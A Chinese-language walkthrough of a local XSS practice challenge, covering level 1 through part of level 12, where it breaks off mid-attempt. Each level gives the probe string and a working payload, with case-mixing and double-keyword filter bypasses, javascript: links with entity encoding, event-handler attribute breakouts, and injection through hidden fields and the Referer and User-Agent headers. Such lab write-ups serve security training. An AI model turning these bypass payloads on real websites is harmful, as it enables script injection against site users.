黑盒：xss挑战解题

第1题
第2题
第3题
第4题
第5题
第6题
第7题
第8题
第9题
第10题
第11题
第12题
第13题

第1题

我这里使用的是本地xsschallenge，你也可以玩在线版的，地址
1：打开xsschallenge，发现长这样

2：点击一下图片，来到了第一题
3：把test替换为

<sCr<scrscRiptipt>ipt>OonN\&apos;\"<>

来进一步检查到底有哪些东西会被替换

会发现文本没有被过滤，那就直接上xss
4：再次修改test的内容为

<script>alert(/xss/)</script>

然后就通过第一关了
点击“确定”进入第2关

补充：一个作弊的方式，如何一口气通关所有关卡
在控制台输入javascript:alert(/xss/)

第2题

首先看到第二题长这个样子

1：先来万能模板试一把，把URL里的test替换为如下内容
URL里的内容

http://10.3.139.51/xsschallenge/level2.php?keyword=test

被替换的test的内容

<sCr<scrscRiptipt>ipt>OonN\&apos;\"<>

可以观察到传进去的内容没有被过滤，只是变成了value的值，那么手动修改payload，让value闭合就行了

2：构造payload

 "><script>alert(/xss/)</script>

通关

第3题

来一个<script " 'Oonn>

“检查元素”发现内容点奇怪，查看页面源代码

发现左右尖括号被编码了，但是单引号没有被转码！
输入以下内容'onmouseover='alert(/xss/)
第一个单引号是闭合前面的单号，第二个单引号是为了闭合后面的单引号，构造出事件驱动，此时“查看页面源代码”

当你把鼠标放在搜索框中时，会出现弹窗

第4题

来一个<script " 'Oonn>
接着查看页面源代码

发现跟第3题没啥区别，把单引号换成双引号就OK
输入以下内容"onmouseover="alert(/xss/)
查看页面源代码

当你把鼠标放在搜索框时，nice

第5题

来一个<script " 'Oonn>
接着查看页面源代码

下面来改造一下测试代码<script script " 'Oonn>
发现跟上一步的结果差不多，仍然是大写变小写，关键字中间过滤（过滤一次），没有过滤单双引号

重新构造一下payload，使用伪协议的方式来构造xss

"><a href = "javascript:alert:alert(/xss/)">click me</a>

页面变成了这个样子

查看一下页面源代码

鼠标点击“click me”按钮，成功

第6题

来一个<script " 'Oonn>
接着查看页面源代码

发现没有做大小写过滤，没有过滤单双引号，只过滤了关键字
尝试第5题中的伪协议

"><a href = "javascript:alert:alert(/xss/)">click me</a>

发现“click me”按钮不是一个链接

查看页面源代码，发现href被过滤了

记得前面没有过滤大小写，修改一下payload

"><a hREf = "javascript:alert:alert(/xss/)">click me</a>

发现“click me”变成超链接了，有戏

鼠标点击一下，成功了

同样还是可以通过大小写策略，使用事件驱动方式触发xss

"Onmouseover="alert(/xss/)

综上，根据只要绕过大小写的策略，你可以写出如下payload


 1. "> <Script>alert(/xss/)</script>
 2. "> <img Src=666 OnError=alert(/xss/)>
 3. "><a hREf = "javascript:alert:alert(/xss/)">click me</a>
 4. "Onmouseover="alert(/xss/)
 ……

第7题

来一个<script " 'OOnn>
接着查看页面源代码

发现：
1：script被过滤了，on还剩一个，猜测只做一次关键字过滤
2：单双引号没有被过滤
那么复写关键字两次就行了，so easy
代码可以抄上一题的，复写两次就行，举个例子

"Oonnmouseover="alert(/xss/)

第8题

来一个<script " 'Oonn>
接着查看页面源代码

首先考虑伪协议尝试绕过

javascript:alert(/xss/)

当鼠标放在“友情链接”上时，发现左下角的URL不对劲

问题不大，对标签页属性进行16进制ASCII编码，再次尝试绕过

java&#x73;cript:alert(/xss/)

当鼠标放在“友情链接”上时，左下角显示正常

成功过关

第9题

既然仍然是友情链接，先尝试上一题的答案

java&#x73;cript:alert(/xss/)

结果被提示链接不合法

那我就先写一个正确的链接
左下角果然提示正常

猜测一下，把payload里面的弹窗改为百度

java&#x73;cript:alert('http://baidu.com')

左下角貌似正常

顺利通过

第10题

把URL栏里面的keyword替换为<script " 'Oonn>

接着查看页面源代码：

发现，除了我们输进去的代码被二次编码了以外，页面中还有三个隐藏的元素，并且隐藏的元素的值为空。那么首先考虑能不能搞一下这三个元素，方式是通过手动传参。于是URL栏里的地址尝试下面的三个

10.3.139.102/xsschallenge/level10.php?t_link=1
10.3.139.102/xsschallenge/level10.php?t_history=1
10.3.139.102/xsschallenge/level10.php?t_sort=1

最终发现，只有第三个URL能够赋值，接着再次把第三条URL修改

10.3.139.102/xsschallenge/level10.php?t_sort=<script " 'Oonn>

查看页面源代码，如下

有戏，接下来就是填字游戏了
【如果直接复制下面代码执行失败，请尝试手动写入】

10.3.139.102/xsschallenge/level10.php?t_sort=click me!" type="button" οnclick="alert(/xss/)

再来看一下页面源代码，不错，高度和谐

点一下“click me”按钮，顺利过关

第11题

把URL栏里面的keyword替换为<script " 'Oonn>
接着查看一下页面源代码，发现跟第10题相似，那就先按照第10题的思路试试

那么隐藏元素走一波

10.3.139.102/xsschallenge/level11.php?t_link=<script " 'Oonn>
10.3.139.102/xsschallenge/level11.php?t_history=<script " 'Oonn>
10.3.139.102/xsschallenge/level11.php?t_sort=<script " 'Oonn>
10.3.139.102/xsschallenge/level11.php?t_ref=<script " 'Oonn>

发现第三条有结果

那么再玩一次填字游戏，尝试第3题的思路

10.3.139.102/xsschallenge/level11.php?t_sort="οnmοuseοver='alert(/xss/)'"

查看页面源代码，又凉了

那么再回过头来搞搞”t_ref”字段，其实查一下文件源代码发现那四行隐藏元素的内容是这样写的：

<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">

所以可以放弃第三行了，使用Hackbar搞一下第四行

查看页面源代码，有戏，跟第10题的套路一样了，那么可以直接拿第10题的答案来套

修改一下Referer字段，然后就过关了。

第12题

先来查看一下页面源代码

看到第20行写有浏览器的指纹，啥也别说了，先搞第20行

首先按F12召唤“查看元素”，然后刷新页面，就会看到网络数据，当你用鼠标选中第一条数据时，右边会显示出详细通信内容，点击一下“重发”按钮，就能重新编辑数据包了

把指纹部分改成测试代码<script " 'Oonn>

发送完数据之后，来查看一下页面源代码，发现还是那个样，显示的还是指纹信息

那就接着使用“查看元素“吧，有戏。

使用上一题的答案click me!" type="button" onclick="alert(/xss/)

看起来是成功了，但是为什么页面没有按钮呢？？？

再来看看”检查元素”，payload设置正常

看一下“预览”，点击按钮无果